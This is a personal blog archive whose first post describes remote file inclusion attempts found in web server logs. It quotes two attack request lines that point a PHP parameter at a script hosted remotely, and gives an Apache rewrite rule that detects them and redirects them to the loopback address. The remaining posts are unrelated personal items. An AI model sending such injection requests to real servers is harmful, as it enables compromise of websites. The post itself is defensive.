Archive for category News
How to frustrate a trojan bot script
Posted by Eric Bazerghi in Geek Stuff, Information Security, News on October 27, 2007
While doing some regular maintance on some websites I manage, I came across some interesting entries in the logs for one of our servers. Hundreds and hundreds of the following types of requests, originating from a wide variety of IP's:
GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt?
GET /modules.php?op=http://amyru.h18.ru/images/cs.txt?
Basically, there are a bunch of 'infected' web servers out there which are trying to get our server to execute code stored in a file on a remote server. The file in the cases above is named 'cs.txt'. You can see the contents of the script/file by reading Dan Langille's sanitized version of the attack script.
While our server was not vulnerable to the attack, I was getting very annoyed with having to respond to the script each time it hit our server with a request. Our server had to run some code, determine that the page didn't exist, produce a page that a normal user would see explaining why their request could not be completed, etc. Then it hit me. Why are we spending all this precious cpu time for these attackers? Why not have them waste their own cpu time? And that's when I decided that the attack script should attack itself. In simple terms, when our web server notices an attack coming in, it simply redirects the request to the originating server. In essence, it's like requesting a webpage from a server, being told that the page has moved and be given a new address to go to. In this case, the new address is http://127.0.0.1. Without getting too technical, that's called a Loopback Address and is a network standard which always points to yourself.
Here's what I put in the Apache webserver httpd.conf file, which is the configuration file for the Apache web server on the Linux server I wanted to modify:
RewriteEngine on
RewriteCond %{QUERY_STRING} cs.txt? [NC]
RewriteRule ^.*$ http://127.0.0.1 [R=301,L]
So now, whenever a request comes in which contains the string 'cs.txt?' in the URL request, I inform the requester that the file they are requesting has been permanently moved to 'http://127.0.0.1', the loopback address and in essence, itself.
While the hits on the server continue, I have noticed they have slowed down, I'm assuming because the remote server is busy talking to itself for a moment. I also have the satisfaction of knowing our server isn't wasting its time with these trojan hits, and letting them talk to themselves for a bit instead.
E-Mail Address Portability?
Posted by Eric Bazerghi in Geek Stuff, News on October 5, 2007
This week, someone decided to petition the FCC for something amazingly stupid: they want the FCC to force ISP's to provide 'e-mail address portability'. Just like with telephone numbers, this individual thinks it's a good idea.
This person doesn't seem to understand the difference between a phone number and a domain name. Domain names are actually entities, bought and owned by someone or a company. The key word is owned. You don't 'own' the email address, in essence, you're 'renting' it! You stop paying, or you move elsewhere, do you really expect the owner to keep handling your e-mail? Even the Postal Service doesn't do this! They'll forward your mail for a few weeks until you notify everyone, and then they're done and out of the loop.
Also, think about the inefficiencies of such a requirement. Over time, someone could change email addresses 2, 3, maybe even 5 times. Say I send an email to address #1 with a 10Mb attachment. According to this petition, the email sent to address #1 would be forwarded to address #2, then from there to address #3, until it gets to address #5. My email has been handled by 5 different ISP's, and they all had to absorb the cost of moving my bytes over to another ISP, and so on. Absolutely ridiculous if you ask me.
I'm all for asking ISP's to do something like this for a very short period of time, just like the Postal Service. But, I would do it somewhat differently. Instead of burdening the ISP's with handling large volumes of potentially large pieces of mail, why not have them issue a 'bounce' back to the sender, with a small note indicating the recipient has 'moved' and here is his/her new email address. We're now talking about an email with a size of 1000 to 2000 bytes, instead of in the megabytes. We avoid forwarding spam, and if the sender email doesn't exist, no second bounce is issued, avoiding a mail loop. I know of a few ISP's that already do this as a courtesy to their customers who have decided to move on. That's just good business if you ask me; never ignore an ex-client, because they might want to come back in the future.
So instead of petitioning for e-mail address portability, we should be asking ISP's to implement some sort of email 'address' forwarding/bounce functionality instead. It's cleaner, more efficient and much less of a burden on ISP's and the infrastructure as a whole.
Dilbert’s 9-Point Financial Plan
Posted by Eric Bazerghi in Fun, News on October 11, 2006
Before I go any further, yes, it's been a while since I last posted here on my site. There's been a lot going on in my personal life in the past year and let's face it; I'm not going to post stuff just for the sake of posting. That being said, I'm going to try and make a concerted effort to be more active here. Yes, I've said it before, so who knows what will happen…
Now, I came across what I initially thought was a joke while reading through some feeds I routinely keep up with. It turns out that in Scott Adam's book "Dilbert and the Way of the Weasels.", there's a simple 9-point plan puts in very simple words how to manage your financial freedom. Paul Farrell, of Marketwatch had this to say about the small blurb:
Adams boldly states that this is "everything you need to know about personal investing." In just 129 words, nine simple points, one page you have the unabridged "Unified Theory of Everything Financial." That's it. Everything!
Here are the 9-points:
- Make a will
- Pay off your credit cards
- Get term life insurance if you have a family to support
- Fund your 401k to the maximum
- Fund your IRA to the maximum
- Buy a house if you want to live in a house and can afford it
- Put six months worth of expenses in a money-market account
- Take whatever money is left over and invest 70% in a stock index fund and 30% in a bond fund through any discount broker and never touch it until retirement
- If any of this confuses you, or you have something special going on (retirement, college planning, tax issues), hire a fee-based financial planner, not one who charges a percentage of your portfolio
There you have it. That's all you need to do! You can read the Marketwatch article at http://www.marketwatch.com/News/Story…
Dual-LCD Monitors
Posted by Eric Bazerghi in Family, Fun, Geek Stuff, News on January 15, 2006
I've been using an LCD monitor at home for about 4-5 years now, ever since my old CRT monitor started acting up and began being sensitive to anything electrical being turned on in the house. Recently, my wife and I decided to transform our seldom-used dining room into a full office; lots of Ikea office furniture and accessories later, I was able to double my deskspace as well as have a place to be a geek on the same floor where we spend most of our time as a family. Of course, all that extra deskspace was the perfect opportunity to purchase a new LCD monitor. A great sale and some online coupons later, I was the new owner of a fantastic DELL UltraSharp 2005FPW 20.1-inch Wide Aspect Flat Panel LCD Monitor. This morning, as I was sitting in front of my computer, it hit me; I have a perfectly good 18.1" LCD monitor just sitting upstairs in my old office gathering dust! I cleared a little bit of space to the right of my Dell LCD and brought the critter down. I use a dual-monitor setup everyday at work, using my laptop screen and a large external CRT monitor. It's a great productivity booster for me, since I can have my Instant Messenger and email clients on my extra screen, while my main desktop holds the applications I currently need to complete whatever job is at hand. A dual-monitor setup is simply incredible if you have the opportunity to set one up for yourself. The use of LCD's is even better, since the power consumption of the two monitors combined is still under what my old CRT beast used to suck out of the power-outlet. Not to mention the negligible heat produced… UPDATE: My new monitor setup meant that a change to my online status page also had to be made. Also, since I was moving the monitor down, I decided to finally move the old webcam down also, so the home-office webcam is also back up and online. Enjoy!
Happy New Year to my Family and Friends!
Posted by Eric Bazerghi in Family, News, TheHouse.Net on January 1, 2006
I wanted to take a minute to wish everyone a very Happy New Year! May the new year bring you hapiness, peace, prosperity, love and lots of cool geek toys!
The Sweet Smell of Battlefield 2
Posted by Eric Bazerghi in Family, Fun, Geek Stuff, News on July 2, 2005
Amy and I decided to head out to Sam’s Club this morning to pick up a few things for the weekend, including some light bulbs and various other sundries. As is always the case, we walk through the DVD and PC software aisles to see if there’s anything that catches our eye and to get some new software for Sara to play with during ‘computer time’. Low and behold, right next to some cool Blue’s Clues game we decide to get for Sara, there’s a stack of Battlefield 2 game boxes. Amy looks at me and tells me how some kid has been posting a bunch of stuff on our community forums about how good this game was, etc. I tell her that I’ve been enjoying the demo and that I’ll probably buy it later in the month, and we continue our morning of shopping in ‘bulk’. While unloading the cart to pay, right there under the Blue’s Clues game is a Battlefield 2 box. I look up at Amy and all she says is “You’re welcome.”, smiles, and continues to unload the cart. Dammit, I love that woman! So, THANKS AMY! Here’s to another few weeks of going to bed late while playing a computer game until the wee hours of the night… Oh, and we forgot to buy the lightbulbs…
Happy Birthday Papa!
Posted by Eric Bazerghi in Family, Fun, News on July 2, 2005
Just wanted to take a minute to wish my dad a wonderful birthday. While he and mom might be 1052 miles away from us, he is always in my heart. Thanks Dad, for being the perfect example of how I in turn should be a father to my daughter. Bonne Fête Papa!
Happy Canada Day!
Posted by Eric Bazerghi in Fun, News on July 1, 2005
Happy Canada Day to all my fellow Canadians! I may be calling the US my home, but having been born and raised in Canada, I still take pride in its culture, its people and the land that made me who I am today. Bonne Fête, Canada!
Many Thought it would Never Happen
Posted by Eric Bazerghi in News, TheHouse.Net on June 21, 2005
Pigs flew and Hell Froze Over. The Fat Lady not only sang, she leapt out of her office chair, partied till dawn, and lost her voice screeching like a madwoman somewhere on the Internet while surfing the night away.
After close to a year, I finally updated my site and hopefully begining a new ‘era’ of more frequent postings. Sure, many of you have laughed at me in the past, mocking my every mention of my work on the site. Well, I’m on a roll now; just a few weeks ago, I finally cleared out our garage after a couple of years of it being a huge mess of a storage area. The garage was something I wanted to get done for a long time, and now, I’m ready to apply that same level of dedication to this website.
Laugh if you wish; hopefully, I will have the last laugh.
Issues with my current website ‘theme’…
Posted by Eric Bazerghi in News, TheHouse.Net on January 26, 2004
I run the latest and greatest CVS version of Drupal under the hood of this site. Looks like the latest changes to the core changed the way a couple of functions I use in my new theme work. Until I can get the code rewritten, this is how the site will look. Not great, but usable I guess…
Yes, I finally updated my site…
Posted by Eric Bazerghi in News, TheHouse.Net on January 22, 2004
I finally got tired of getting ridiculed by Scott and Matt and took the time to get a few things straightened out in order to get the new site out.
I’ve moved away from using Postnuke, which was becoming more of a burden each time I wanted to do something with the site. It was also heavy and full of bugs that drove me nuts. I’m now using Drupal as the core CMS for the site. It’s MUCH easier to play with the code, the look and feel, etc. Also, I have been dealing with a couple of members of the development team and find this Open Source package an refreshing change from other cores I looked at.
I still have work to do, but what you see here is probably 75% of what the site will actually end up looking like. Let me know if you have any ideas and/or issues.
Thanks.